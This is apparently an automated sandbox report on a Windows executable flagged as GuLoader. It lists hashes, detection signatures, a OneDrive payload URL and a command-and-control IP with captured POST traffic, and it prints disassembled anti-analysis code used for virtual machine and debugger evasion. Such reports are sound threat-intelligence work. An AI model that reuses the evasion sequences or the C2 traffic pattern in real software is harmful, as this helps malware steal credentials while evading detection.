Windows Analysis Report KHAWATMI CO.IMPORT & EXPORT.exe

Overview

General Information

Sample Name: KHAWATMI CO.IMPORT & EXPORT.exe
Analysis ID: 458277
MD5: 0153ae8cf4b1f546721332b5cb3f973c
SHA1: 479858ef740172cb3791527a9c9d0da76eec3af4
SHA256: 97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
Tags: exe

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}
    Multi AV Scanner detection for submitted file
    Source: KHAWATMI CO.IMPORT & EXPORT.exe | ReversingLabs: Detection: 13%
    Source: KHAWATMI CO.IMPORT & EXPORT.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor | URLs: https://onedrive.live.com/download?cid=7B0580AA0B18AE
    Source: Joe Sandbox View | IP Address: 185.227.139.18 185.227.139.18
    Source: global traffic | HTTP traffic detected:
        POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 185.227.139.18
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: 976E9D7A
        Content-Length: 190
        Connection: close
    Source: global traffic | HTTP traffic detected:
        POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 185.227.139.18
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: 976E9D7A
        Content-Length: 163
        Connection: close
    Source: unknown | TCP traffic detected without corresponding DNS query: 185.227.139.18
    Source: unknown | DNS traffic detected: queries for: onedrive.live.com
    Source: unknown | HTTP traffic detected:
        POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 185.227.139.18
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: 976E9D7A
        Content-Length: 190
        Connection: close
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 03 Aug 2021 06:12:26 GMT
        Server: Apache
        Connection: close
        Content-Type: text/html; charset=UTF-8
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_004028B8 GetAsyncKeyState,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Process Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1611B NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1A932 NtWriteVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D166C6 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D151C1 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D145CD NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D14DF2 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D16BFE NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D153E5 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D10BEC NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D16795 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D19D8D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D157AF NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D14F79 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D15B65 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1556D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D15B03 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D14CD1 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D152C9 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D158CD NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1B4F9 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D126E7 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D15681 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D15072 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1547B NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1347D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D15A25 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 24_2_0056B6B4 LdrInitializeThunk,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 24_2_0056B7E6 Sleep,NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 24_2_0056B811 NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 24_2_0056B727 NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 24_2_0056B6AD LdrInitializeThunk,NtProtectVirtualMemory,
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.603288987.00000000021F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000000.601895516.0000000000424000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029860319.000000001DEC0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029835895.000000001DD70000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe | Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | File created: C:\Users\user\AppData\Local\Temp\~DF7B66B65AC3863AED.TMP
    Source: KHAWATMI CO.IMPORT & EXPORT.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | File read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: unknown | Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match | File source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_00407A2B push esp; retf
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D1636D push ebp; ret
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D10062 push esi; iretd
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Code function: 1_2_03D10005 push esi; iretd
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe | Process information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX

    Malware Analysis System Evasion:

    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F36 TerminateProcess,LoadLibraryA,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FD4
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FCE
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FF2
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D111F5 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D135F9
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10BEC NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FEC
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1A18A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D8D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F51 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11546 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1374E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F77 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18F7D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1131A TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D12B1E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11107 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D39
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19F3A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D134D3
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19E75
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1347D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1141F TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D13827
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\qga\qga.exe
